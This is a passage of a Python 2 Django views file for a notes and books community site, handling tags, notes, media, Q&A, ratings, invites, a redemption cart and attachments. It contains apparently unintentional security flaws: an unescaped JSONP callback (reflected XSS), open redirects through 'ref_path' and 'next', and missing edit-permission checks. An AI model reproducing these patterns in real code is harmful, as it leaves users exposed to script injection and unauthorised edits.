('Book Edit - %s' % book.title)})\r\n\r\ndef book_moderators_view(request, book_id, page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. Sorry.'})\r\n\r\n moderators = book.moderators.all()\r\n moderators = make_paginator(moderators, page_no, num)\r\n paging_url = '/book/moderators/%s/<PAGENO>/' % (book.id)\r\n\r\n title ='Moderators for book: %s' % (book.title)\r\n page_title = PTITLE % (title)\r\n\r\n return render_response(request, 'ui/users.html',\r\n {'users': moderators,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'paging_url': paging_url})\r\n\r\n@custom_login_required\r\ndef book_request_moderation_view(request, book_id):\r\n\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. Sorry.'})\r\n\r\n notification.send([book.user], 'book_mod_request',\r\n {'user': request.user, 'book': book})\r\n\r\n page_title = PTITLE % ('Book moderation request sent')\r\n return render_response(request, 'ui/book_request_moderation.html',\r\n {'owner': book.user,\r\n 'page_title': page_title,\r\n 'book': book})\r\n\r\n@custom_login_required\r\ndef book_confirm_moderation_view(request, book_id, username):\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_error(request, 'Could not locate the book. Sorry.')\r\n\r\n if request.user != book.user:\r\n return render_error(request, 'You are not the owner of this book.')\r\n\r\n try:\r\n user = User.objects.get(username=username)\r\n except ObjectDoesNotExist:\r\n return render_error(request, 'User \"%s\" not known' % username)\r\n\r\n book.moderators.add(user)\r\n\r\n page_title = PTITLE % ('Book moderation request accepted')\r\n return render_response(request, 'ui/book_moderation_accepted.html',\r\n {'moderator': user,\r\n 'page_title': page_title,\r\n 'book': book})\r\n\r\ndef books_view(request):\r\n return HttpResponseRedirect(reverse('books_recent_page'))\r\n\r\ndef books_recent_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n books = Book.objects.all().order_by('-date_added')\r\n books = make_paginator(books, page_no, num)\r\n paging_url = '/books/recent/<PAGENO>/'\r\n page_title = PTITLE % ('Recently Added Books')\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title,\r\n 'paging_url': paging_url})\r\n\r\ndef books_popular_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n books = Book.objects.all().order_by('-tot_count')\r\n books = make_paginator(books, page_no, num)\r\n paging_url = '/books/popular/<PAGENO>/'\r\n page_title = PTITLE % ('Most Popular Books')\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef books_tag_view(request, tag, page_no=1, num=ITEMS_PER_PAGE):\r\n books = get_items_by_tag(Book, [tag], 'all')\r\n books = make_paginator(books, page_no, num)\r\n paging_url = '/books/tag/%(tag)s/<PAGENO>/' % locals()\r\n page_title = PTITLE % ('Books tagged \"%s\"' % tag)\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef books_tag_all_view(request, tags, page_no=1, num=ITEMS_PER_PAGE):\r\n paging_url = '/books/tag/all/%(tags)s/<PAGENO>/' % locals()\r\n tags = [t.strip() for t in tags.split('/') if t.strip()]\r\n books = get_items_by_tag(Book, tags, 'all')\r\n books = make_paginator(books, page_no, num)\r\n page_title = PTITLE % ('Books tagged \"%s\"' % ', '.join(tags))\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef books_tag_any_view(request, tags, page_no=1, num=ITEMS_PER_PAGE):\r\n paging_url = '/books/tag/any/%(tags)s/<PAGENO>/' % locals()\r\n tags = [t.strip() for t in tags.split('/') if t.strip()]\r\n books = get_items_by_tag(Book, tags, 'any')\r\n books = make_paginator(books, page_no, num)\r\n page_title = PTITLE % ('Books tagged with one of \"%s\"' % ', '.join(tags))\r\n return render_response(request, 'ui/books_list.html',\r\n {'books': books, 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef tags_view(request):\r\n term = request.GET['q'].lower()\r\n\r\n query = 'SELECT id, name FROM core_tag WHERE LOWER(name) LIKE %s ORDER BY name'\r\n cursor = connection.cursor()\r\n cursor.execute(query, ('%'+term+'%',))\r\n\r\n tags = [dict(id=_id, name=name) for _id, name in cursor.fetchall()]\r\n\r\n if 'callback' in request.GET:\r\n response = '%s(%s)' % (request.GET['callback'], json.dumps(tags))\r\n else:\r\n response = json.dumps(tags)\r\n\r\n return HttpResponse(response, mimetype='application/json')\r\n\r\ndef node_view(request, node_id):\r\n try:\r\n node = Node.objects.get(id=node_id)\r\n load_media(node)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/node.html', {\r\n 'error': 'no node with id %s' % node_id})\r\n\r\n bread_crumbs = build_breadcrumbs(node)\r\n\r\n return render_response(request, 'ui/node.html', {\r\n 'node': node,\r\n 'bread_crumbs': bread_crumbs,\r\n 'page_title': PTITLE % ('Topic - %s' % node.title)}\r\n )\r\n\r\ndef build_breadcrumbs(node):\r\n s = StringIO()\r\n parents = []\r\n\r\n parents.append(('/node/%s/%s/' % (node.id, urlsafe(node.title)),\r\n xcode(node.title)))\r\n\r\n while node.parent:\r\n node = node.parent\r\n parents.append(('/node/%s/%s/' % (node.id, urlsafe(node.title)),\r\n xcode(node.title)))\r\n\r\n parents.append(('/book/%s/%s/' % (node.book.id, urlsafe(node.book.title)),\r\n xcode(node.book.title)))\r\n\r\n while parents:\r\n url, title = parents.pop()\r\n s.write('<a href=\"%s\">%s</a>' % (url, title))\r\n if parents:\r\n s.write(' > ')\r\n\r\n return s.getvalue()\r\n\r\ndef note_view(request, note_id):\r\n\r\n note = Note.objects.get(id=note_id)\r\n page_title = PTITLE % ('Notes for %s' % note.target.title)\r\n\r\n return render_response(request, 'ui/note.html', {\r\n 'note': note, 'page_title': page_title})\r\n\r\n@custom_login_required\r\ndef note_edit_view(request, note_id, page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n note = Note.objects.get(id=note_id)\r\n versions = Version.objects.get_for_object(note).reverse()\r\n\r\n if 'note' in request.POST:\r\n\r\n redirect_url = xcode(request.POST['content_path'])\r\n if not request.POST['note'] and not versions:\r\n note.delete()\r\n return HttpResponseRedirect(redirect_url)\r\n\r\n with revision:\r\n note.text.raw = request.POST['note']\r\n note.save()\r\n\r\n revision.user = request.user\r\n revision.comment = request.POST['comment'] or 'update'\r\n\r\n followers = get_followers(note, note.target,\r\n request.user.get_profile())\r\n notification.send(followers, 'note_changed', {'user': request.user,\r\n 'note': note})\r\n\r\n\r\n return HttpResponseRedirect(redirect_url)\r\n\r\n else:\r\n\r\n versions = make_paginator(versions, page_no, num)\r\n paging_url = '/note/%s/revisions/<PAGENO>/' % note.id\r\n page_title = PTITLE % ('Notes for %s' % note.target.title)\r\n\r\n return render_response(request, 'ui/note_edit.html',\r\n {'note': note, 'versions': versions,\r\n 'page_title': page_title,\r\n 'paging_url': paging_url})\r\n\r\ndef note_revision_view(request, note_id, revision_id):\r\n note = Note.objects.get(id=note_id)\r\n version = Version.objects.get(id=revision_id)\r\n page_title = PTITLE % ('Note Revision for %s' % note.target.title)\r\n\r\n return render_response(request, 'ui/revision.html',\r\n {'version': version, 'note': note, 'page_title': page_title})\r\n\r\n@custom_login_required\r\ndef note_revision_revert_view(request, note_id, revision_id):\r\n version = Version.objects.get(id=revision_id)\r\n note = Note.objects.get(id=note_id)\r\n\r\n with revision:\r\n note.text.raw = version.field_dict['text']\r\n note.save()\r\n\r\n revision.user = request.user\r\n revision.comment = 'reverting to revision number %d' % version.id\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\ndef video_view(request, avideo_id):\r\n amedia = None\r\n\r\n try:\r\n avideo = AssociatedMedia.objects.get(id=avideo_id)\r\n title = avideo.media.title\r\n\r\n except ObjectDoesNotExist:\r\n #return render_response(request, 'ui/video.html',\r\n # {'error': 'no video with id %s' % video_id})\r\n\r\n #Added on 11-10-2013 by Yatish(to handle error condition if video is not present)\r\n #return HttpResponseRedirect(reverse('home_page'))\r\n #data = render_to_response(request, 'ui/404.html')\r\n data = render_response(request, 'ui/404.html')\r\n return HttpResponse(data.content, status=410)\r\n\r\n return render_response(request, 'ui/video.html',\r\n {'avideo': avideo,\r\n 'page_title': PTITLE % ('Video for %s' % title)})\r\n\r\ndef videos_view(request, target_type, target,\r\n page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n videos = make_paginator(target.videos, page_no, num)\r\n paging_url = '/videos/%s/%s/<PAGENO>/%s/' % (target.ctype.id,\r\n target.id, target.title)\r\n\r\n return render_response(request, 'ui/videos.html',\r\n {'target': target, 'videos': videos,\r\n 'page_title': PTITLE % ('Videos for %s' % target.title),\r\n 'paging_url': paging_url})\r\n\r\ndef image_view(request, image_id):\r\n try:\r\n image = Image.objects.get(id=image_id)\r\n args = {'image': image}\r\n except ObjectDoesNotExist:\r\n args = {'error': 'no image with id %s' % image_id}\r\n\r\n # FIXME: args['page_title'] = PTITLE\r\n return render_response(request, 'ui/image.html', args)\r\n\r\ndef images_view(request, target_type, target,\r\n page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n images = make_paginator(target.images, page_no, num)\r\n\r\n # FIXME: compute page title and pass to template as page_title\r\n return render_response(request, 'ui/images.html',\r\n {'target': target, 'images': images})\r\n\r\ndef notes_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n notes = make_paginator(target.notes, page_no, num)\r\n paging_url = '/notes/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n page_title = PTITLE % ('Notes for %s' % target.title)\r\n\r\n return render_response(request, 'ui/notes.html',\r\n {'target': target, 'notes': notes,\r\n 'page_title': page_title,\r\n 'paging_url': paging_url})\r\n\r\ndef get_yt_id(yt_url):\r\n query_part = yt_url.split('?')[-1]\r\n parts = query_part.split('&')\r\n for p in parts:\r\n if p.startswith('v='):\r\n return p.split('v=')[-1]\r\n return None\r\n\r\ndef get_ytvideo_title(yt_id):\r\n api = 'http://gdata.youtube.com/feeds/api/videos/%s'\r\n url = api % yt_id\r\n\r\n text = get_doc(url, settings.CACHE_DIR)\r\n title = re.findall('<title.*?>(.*?)</title>', text)\r\n if title:\r\n return title[0].decode('utf8', 'ignore')\r\n return None\r\n\r\n@custom_login_required\r\ndef add_video(request):\r\n user = request.user\r\n\r\n video_url = request.POST['video_url']\r\n target = get_target_from_req(request)\r\n\r\n yt_id = get_yt_id(video_url)\r\n\r\n if not yt_id:\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n title = get_ytvideo_title(yt_id)\r\n\r\n try:\r\n video = Video.objects.create(source='youtube', source_id=yt_id,\r\n user=user, title=title)\r\n except IntegrityError:\r\n video = Video.objects.get(source='youtube', source_id=yt_id)\r\n\r\n try:\r\n avideo = AssociatedMedia.add(user=user, target=target, media=video)\r\n avideo.rate_up(user)\r\n avideo.save()\r\n follow_root(avideo, user)\r\n\r\n give_points('video_add', user=user.id, avideo=avideo.id)\r\n ac = Activity.add(user, avideo)\r\n add_to_book_stream(avideo, ac)\r\n\r\n followers = get_followers(video, user.get_profile())\r\n notification.send(followers, 'video_add', {'user': user,\r\n 'video': video})\r\n except IntegrityError:\r\n pass\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef add_image(request):\r\n user = request.user\r\n\r\n target_type = request.POST['target_type']\r\n target = request.POST['target']\r\n image_url = request.POST['image_url']\r\n\r\n target_type = ContentType.objects.get(id=int(target_type))\r\n target = content_type.get_object_for_this_type(id=int(target))\r\n target = get_target_from_req(request)\r\n\r\n #TODO Integrity check has to be done\r\n image = Image.objects.create(url=image_url, user=user)\r\n aimage = AssociatedMedia.add(user=user, target=target, media=image)\r\n aimage.rate_up(user)\r\n aimage.save()\r\n follow_root(aimage, user)\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef add_note(request):\r\n user = request.user\r\n target = get_target_from_req(request)\r\n\r\n note = Note.add(target, user=user)\r\n note.rate_up(user)\r\n note.save()\r\n follow_root(note, user)\r\n\r\n give_points('note_add', user=user.id, note=note.id)\r\n ac = Activity.add(user, note)\r\n add_to_book_stream(note, ac)\r\n\r\n return HttpResponseRedirect(reverse('note_edit_page', args=(note.id,)))\r\n\r\n@custom_login_required\r\ndef question(request):\r\n user = request.user\r\n q_text = request.POST['question_text']\r\n if not q_text:\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n target = get_target_from_req(request)\r\n question = Question.add(user, target, q_text)\r\n question.rate_up(user)\r\n question.save()\r\n follow_root(question, user)\r\n\r\n ac = Activity.add(user, question)\r\n add_to_book_stream(question, ac)\r\n give_points('question_add', user=user.id, question=question.id)\r\n\r\n followers = get_followers(target, user.get_profile())\r\n notification.send(followers, 'question_add', {'user': user,\r\n 'question': question})\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef answer(request):\r\n user = request.user\r\n\r\n q_id = request.POST['q_id']\r\n a_text = sanitize_whitespace(request.POST['answer_text'])\r\n if not a_text:\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n question = Question.objects.get(id=q_id)\r\n answer = Answer.objects.create(user=user, question=question, text=a_text)\r\n answer.rate_up(user)\r\n answer.save()\r\n question.save()\r\n follow_root(question, user)\r\n\r\n ac = Activity.add(user, answer)\r\n if question.user != user:\r\n question.user.get_profile().stream.add(ac)\r\n add_to_book_stream(answer, ac)\r\n\r\n give_points('answer_add', user=user.id, answer=answer.id)\r\n\r\n followers = get_followers(question,\r\n question.target,\r\n user.get_profile())\r\n notification.send(followers, 'answer_add', {'user': user, 'answer': answer,\r\n 'question': question})\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\ndef question_view(request, q_id):\r\n question = Question.objects.get(id=q_id)\r\n answer_text_id = 'answer_text_%d_%d' % (question.ctype.id, question.id)\r\n page_title = PTITLE % ('Question: %s' % question.text.raw)\r\n\r\n return render_response(request, 'ui/question.html', {\r\n 'question': question, 'page_title': page_title,\r\n 'answer_text_id': answer_text_id})\r\n\r\ndef questions_view(request, target_type, target,\r\n page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n questions = make_paginator(target.questions.all(), page_no, num)\r\n paging_url = '/questions/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n page_title = PTITLE % ('Questions for %s' % target.title)\r\n\r\n return render_response(request, 'ui/questions.html', {\r\n 'target': target,\r\n 'questions': questions,\r\n 'page_title': page_title,\r\n 'paging_url': paging_url}\r\n )\r\n\r\n@custom_login_required\r\ndef rate(request):\r\n user = request.user\r\n\r\n rating = request.POST['rating']\r\n target = get_target_from_req(request)\r\n\r\n rate_obj = target.rate_up(user) if rating == 'up' else target.rate_down(user)\r\n target.save()\r\n\r\n if rate_obj:\r\n ac = Activity.add(user, rate_obj)\r\n\r\n if target.user != user:\r\n target.user.get_profile().stream.add(ac)\r\n add_to_book_stream(target, ac)\r\n\r\n follow_root(target, user)\r\n\r\n followers = get_followers(target, user.get_profile())\r\n\r\n template_variables = {'user': user, 'rate_obj': target, 'rating': rating}\r\n fn = lambda n: notification.send(followers, n, template_variables)\r\n\r\n if isinstance(target, Question):\r\n fn('question_rated')\r\n elif isinstance(target, Answer):\r\n fn('answer_rated')\r\n elif isinstance(target, UserProfile):\r\n fn('profile_rated')\r\n elif isinstance(target, Note):\r\n fn('note_rated')\r\n elif isinstance(target, AssociatedMedia):\r\n fn('video_rated')\r\n elif isinstance(target, Book):\r\n fn('book_rated')\r\n elif isinstance(target, Node):\r\n fn('node_rated')\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef follow(request):\r\n user = request.user\r\n\r\n follow = request.POST['follow']\r\n target = get_target_from_req(request)\r\n follow_obj = target.follow(user) if follow == 'follow' else target.unfollow(user)\r\n target.save()\r\n\r\n if follow_obj:\r\n ac = Activity.add(user, follow_obj)\r\n\r\n if target.user != user:\r\n target.user.get_profile().stream.add(ac)\r\n add_to_book_stream(target, ac)\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\n@custom_login_required\r\ndef flag(request):\r\n user = request.user\r\n\r\n flag = request.POST['flag']\r\n target = get_target_from_req(request)\r\n flag_obj = target.flag(user) if flag == 'flag' else target.unflag(user)\r\n target.save()\r\n\r\n if flag_obj:\r\n ac = Activity.add(user, flag_obj)\r\n\r\n if target.user != user:\r\n target.user.get_profile().stream.add(ac)\r\n add_to_book_stream(target, ac)\r\n\r\n return HttpResponseRedirect(request.POST['ref_path'])\r\n\r\ndef feedback_view(request):\r\n name = ''\r\n email = ''\r\n\r\n if request.user.is_authenticated():\r\n name = request.user.get_profile().title\r\n email = request.user.email\r\n\r\n if request.method == 'POST':\r\n form = FeedbackForm(request.POST)\r\n\r\n if form.is_valid():\r\n\r\n name = form.cleaned_data['name']\r\n email = form.cleaned_data['email']\r\n feedback = form.cleaned_data['feedback']\r\n\r\n followers = User.objects.filter(is_superuser=True)\r\n# import pdb; pdb.set_trace()\r\n notification.send(followers, '_user_feedback',\r\n {'user': request.user, 'feedback': feedback,\r\n 'name': name, 'email': email})\r\n\r\n return HttpResponseRedirect(reverse('feedback_sent_page'))\r\n else:\r\n data = {'name': name, 'email': email}\r\n form = FeedbackForm(initial=data)\r\n\r\n return render_response(request, 'ui/feedback.html',\r\n {'form': form,\r\n 'page_title': PTITLE % 'Feedback'})\r\n\r\ndef feedback_sent_view(request):\r\n return render_response(request, 'ui/feedback_sent.html', {})\r\n\r\[email protected]_login()\r\ndef fb_login(request):\r\n user = authenticate(request=request)\r\n\r\n if user and user.is_active:\r\n login(request, user)\r\n\r\n if not user.email:\r\n next = '/email/'\r\n else:\r\n next = request.GET.get('next', reverse('home_page'))\r\n\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef invite_view(request):\r\n if request.method == 'POST':\r\n form = InviteForm(request.POST)\r\n if form.is_valid():\r\n next = request.POST.get('ref_path', '')\r\n emails = form.cleaned_data['emails']\r\n message = form.cleaned_data['message']\r\n\r\n recipients = re.findall('[A-Za-z0-9\\._@]+', emails)\r\n subject = 'Invitation from %s.' % request.user.get_profile().title\r\n t = template.loader.get_template('ui/invite_message.html')\r\n c = Context({'user': request.user, 'message': message})\r\n body = t.render(c)\r\n\r\n send_mail(subject, body, settings.DEFAULT_FROM_EMAIL, recipients)\r\n\r\n return HttpResponseRedirect(next or reverse('home_page'))\r\n else:\r\n form = InviteForm()\r\n next = request.GET.get('ref_path', '')\r\n\r\n return render_response(request, 'ui/invite.html',\r\n {'form': form,\r\n 'next': next,\r\n 'page_title': PTITLE % 'Invite Friends'})\r\n\r\ndef uppers_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n uppers = target.ratings.filter(rating=1).order_by('-date_added')\r\n uppers = make_paginator(uppers, page_no, num)\r\n paging_url = '/up/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n\r\n page_title = PTITLE % ('Users who liked %s' % target.title)\r\n title = 'Users who liked '\r\n\r\n if isinstance(target, User):\r\n target = target.get_profile\r\n\r\n can_rate_or_flag = isinstance(target, RateFlag)\r\n can_follow = isinstance(target, Followable)\r\n\r\n return render_response(request, 'ui/ausers.html',\r\n {'target': target, 'users': uppers,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'can_rate_or_flag': can_rate_or_flag,\r\n 'can_follow': can_follow,\r\n 'paging_url': paging_url})\r\n\r\ndef downers_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n downers = target.ratings.filter(rating=-1).order_by('-date_added')\r\n downers = make_paginator(downers, page_no, num)\r\n paging_url = '/down/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n\r\n page_title = PTITLE % ('Users who disliked %s' % target.title)\r\n title = 'Users who disliked '\r\n if isinstance(target, User):\r\n target = target.get_profile\r\n\r\n if isinstance(target, Node) or isinstance(target, Book):\r\n isprimarymodel = True\r\n else:\r\n isprimarymodel = False\r\n\r\n return render_response(request, 'ui/ausers.html',\r\n {'target': target, 'users': downers,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'isprimarymodel': isprimarymodel,\r\n 'paging_url': paging_url})\r\n\r\ndef followers_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n followers = target.followers.order_by('-date_added')\r\n followers = make_paginator(followers, page_no, num)\r\n paging_url = '/followers/%s/%s/<PAGENO>/' % (target.ctype.id, target.id)\r\n\r\n page_title = PTITLE % ('Followers of %s' % target.title)\r\n title = 'Followers of '\r\n if isinstance(target, User):\r\n target = target.get_profile\r\n\r\n if isinstance(target, Node) or isinstance(target, Book):\r\n isprimarymodel = True\r\n else:\r\n isprimarymodel = False\r\n\r\n return render_response(request, 'ui/ausers.html',\r\n {'target': target, 'users': followers,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'isprimarymodel': isprimarymodel,\r\n 'paging_url': paging_url})\r\n\r\ndef users_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n term = request.GET.get('q', None)\r\n\r\n if term:\r\n term = term.lower()\r\n\r\n users = User.objects.filter(Q(username__icontains=term) |\\\r\n Q(first_name__icontains=term) |\\\r\n Q(last_name__icontains=term))\r\n\r\n MAX_USERS = 10\r\n users = [dict(id=u.id, name=u.get_profile().title)\\\r\n for u in users[:MAX_USERS]]\r\n if 'callback' in request.GET:\r\n response = '%s(%s)' % (request.GET['callback'], json.dumps(users))\r\n else:\r\n response = json.dumps(users)\r\n\r\n return HttpResponse(response, mimetype='application/json')\r\n\r\n if not request.user.is_superuser:\r\n error = \"You don't have permission to see this page\"\r\n return render_response(request, 'ui/users.html',\r\n {'error':error})\r\n\r\n users = User.objects.order_by('-date_joined')\r\n users = make_paginator(users, page_no, num)\r\n paging_url = '/users/<PAGENO>/'\r\n\r\n page_title = PTITLE % ('Users')\r\n title = 'Users of Notemonk'\r\n\r\n return render_response(request, 'ui/users.html',\r\n {'users': users,\r\n 'page_title': page_title,\r\n 'title': title,\r\n 'paging_url': paging_url})\r\n\r\ndef redeemables_view(request, page_no=1, num=ITEMS_PER_PAGE):\r\n redeemables = RedeemableItem.objects.exclude(num=0).order_by('-credits')\r\n redeemables = make_paginator(redeemables, page_no, num)\r\n paging_url = '/redeemables/<PAGENO>'\r\n return render_response(request, 'ui/redeemables.html',\r\n {'redeemables': redeemables,\r\n 'page_title': PTITLE % 'Redeemables',\r\n 'paging_url': paging_url})\r\n\r\ndef redeemable_view(request, item_id):\r\n redeemable = RedeemableItem.objects.get(id=int(item_id))\r\n page_title = PTITLE % ('Redeemable - %s' % xcode(redeemable.title),)\r\n return render_response(request, 'ui/redeemable.html',\r\n {'redeemable': redeemable,\r\n 'page_title': page_title})\r\n\r\ndef redemption_view(request, r_id):\r\n\r\n show_msg = request.GET.get('msg', None)\r\n redemption = Redemption.objects.get(id=r_id)\r\n redemption_items = RedemptionItem.objects.filter(redemption=redemption)\r\n more_info = False\r\n\r\n user = request.user\r\n if user.is_superuser or user.is_staff or redemption.user == user:\r\n more_info = True\r\n\r\n message = ''\r\n if show_msg:\r\n message = 'Checkout done. You will receive the items within 15 days from the end of this month'\r\n\r\n return render_response(request, 'ui/redemption.html',\r\n {'redemption': redemption,\r\n 'redemption_items': redemption_items,\r\n 'more_info': more_info,\r\n 'error': message})\r\n\r\n@custom_login_required\r\ndef cart_add_view(request, item_id, num_items):\r\n redeemable = RedeemableItem.objects.get(id=item_id)\r\n\r\n if redeemable.num:\r\n num_items = int(num_items) if num_items else 0\r\n cart = request.session.get('cart', [])\r\n\r\n if item_id not in dict(cart):\r\n cart.append([item_id, num_items or 1])\r\n\r\n else:\r\n for index, (cur_item_id, num) in enumerate(cart):\r\n if cur_item_id == item_id:\r\n cart[index] = [item_id, num_items or (num + 1)]\r\n break\r\n\r\n request.session['cart'] = cart\r\n\r\n next = request.GET.get('next', reverse('home_page'))\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef cart_remove_view(request, item_id):\r\n cart = request.session.get('cart', [])\r\n\r\n for index, (cur_item_id, num) in enumerate(cart):\r\n if cur_item_id == item_id:\r\n cart[index] = None\r\n\r\n request.session['cart'] = [x for x in cart if x is not None]\r\n\r\n next = request.GET.get('next', reverse('home_page'))\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef cart_checkout_view(request):\r\n\r\n profile = request.user.get_profile()\r\n\r\n if request.method == 'POST':\r\n form = MailingAddressForm(request.POST)\r\n if form.is_valid():\r\n mailing_address = form.cleaned_data['mailing_address']\r\n profile.mailing_address = mailing_address\r\n profile.save()\r\n\r\n r = Redemption.add(request.session['cart'], request.user)\r\n del request.session['cart']\r\n\r\n if r:\r\n followers = get_followers(profile)\r\n Activity.add(request.user, r)\r\n notification.send(followers, 'user_redeemed',\r\n {'user': request.user, 'redemption': r})\r\n else:\r\n request.session['cart'] = []\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Someone grabbed the items before you did. Try again.'})\r\n\r\n return HttpResponseRedirect(reverse('redemption_page',\r\n kwargs={'r_id': r.id}) + '?msg=1')\r\n else:\r\n form = MailingAddressForm(initial =\r\n {'mailing_address': profile.mailing_address})\r\n\r\n return render_response(request, 'ui/cart_checkout.html',\r\n {'form': form,\r\n 'page_title': PTITLE % 'Checkout'})\r\n\r\n@ensure_no_mem_file\r\n@custom_login_required\r\ndef insert_image_view(request, target_type=None, target=None):\r\n\r\n if target_type is not None and target is not None:\r\n target = get_target(target_type, target)\r\n\r\n url = ''\r\n error = ''\r\n title = ''\r\n alt = ''\r\n\r\n if request.method == 'POST':\r\n url = request.POST.get('url', '')\r\n title = request.POST.get('title', '')\r\n alt = request.POST.get('alt', '')\r\n\r\n image = request.FILES.get('image')\r\n\r\n if image:\r\n path = image.temporary_file_path()\r\n try:\r\n PIL.open(path)\r\n except IOError:\r\n error = 'Please upload only image files'\r\n\r\n if image and not error:\r\n\r\n title = title or image.name\r\n alt = alt or image.name\r\n\r\n data = image.read()\r\n checksum = hashlib.md5(data).hexdigest()\r\n\r\n try:\r\n ufile = UploadedFile.objects.get(checksum=checksum)\r\n except ObjectDoesNotExist:\r\n ufile = UploadedFile.objects.create(checksum=checksum,\r\n uploader=request.user)\r\n cfile = ContentFile(data)\r\n ufile.file.save(image.name, cfile, save=True)\r\n ufile.save()\r\n\r\n url = ufile.file.url\r\n\r\n if target:\r\n try:\r\n attachment = target.attachments.get(uploaded_file=ufile)\r\n title = title or attachment.title\r\n except ObjectDoesNotExist:\r\n attachment = target.attach(request.user, ufile=ufile, title=title)\r\n\r\n return render_response(request, 'ui/insert_image.html',\r\n {'error': error, 'alt': alt,\r\n 'url': url, 'title': title})\r\n\r\ndef attachments_view(request, target_type, target, page_no=1, num=ITEMS_PER_PAGE):\r\n target = get_target(target_type, target)\r\n attachments = make_paginator(target.attachments.all(), page_no, num)\r\n page_title = PTITLE % ('Attachments for %s' % target.title)\r\n paging_url = '/attachments/%d/%d/<PAGENO>/' % (target.ctype.id, target.id)\r\n return render_response(request, 'ui/attachments.html',\r\n {'target': target, 'attachments': attachments,\r\n 'page_title': page_title, 'paging_url': paging_url})\r\n\r\ndef attachment_view(request, attachment_id):\r\n attachment = Attachment.objects.get(id=attachment_id)\r\n page_title = PTITLE % ('Attachment: %s' % attachment.title)\r\n\r\n is_editable = False\r\n if not request.user.is_anonymous():\r\n is_editable = attachment.is_editable_by(request.user)\r\n\r\n return render_response(request, 'ui/attachment.html',\r\n {'attachment': attachment, 'page_title': page_title,\r\n 'is_editable': is_editable})\r\n\r\n@custom_login_required\r\ndef attachment_add_view(request, target_type, target):\r\n target = get_target(target_type, target)\r\n url = ''\r\n error = ''\r\n\r\n if request.method == 'POST':\r\n\r\n url = request.POST.get('url', '')\r\n\r\n f = request.FILES.get('file')\r\n if f:\r\n\r\n checksum = get_md5(f)\r\n f.seek(0)\r\n print 'checksum is ', checksum\r\n try:\r\n print 'insdie try'\r\n ufile = UploadedFile.objects.get(checksum=checksum)\r\n print 'ufile is ', ufile\r\n except ObjectDoesNotExist:\r\n ufile = UploadedFile.objects.create(checksum=checksum,\r\n uploader=request.user)\r\n ufile.file.save(f.name, f, save=True)\r\n ufile.save()\r\n\r\n url = ufile.file.url\r\n\r\n try:\r\n attachment = target.attachments.get(uploaded_file=ufile)\r\n except ObjectDoesNotExist:\r\n attachment = target.attach(request.user, ufile=ufile, title='attachment')\r\n attachment.rate_up(request.user)\r\n attachment.save()\r\n ac = Activity.add(request.user, attachment)\r\n add_to_book_stream(attachment, ac)\r\n\r\n elif url:\r\n\r\n try:\r\n attachment = target.attachments.get(url=url)\r\n except ObjectDoesNotExist:\r\n attachment = target.attach(request.user, url=url, title='attachment')\r\n attachment.rate_up(request.user)\r\n attachment.save()\r\n\r\n return HttpResponseRedirect(reverse('attachment_edit_page',\r\n kwargs={'attachment_id': attachment.id}))\r\n\r\n return render_response(request, 'ui/attachment_add.html',\r\n {'error': error, 'url': url, 'target': target})\r\n\r\n@custom_login_required\r\ndef attachment_edit_view(request, attachment_id):\r\n error = False\r\n attachment = Attachment.objects.get(id=attachment_id)\r\n page_title = PTITLE % ('Attachment: %s' % attachment.title)\r\n\r\n #FIXME: check if attachment is editable by current user\r\n\r\n if request.method 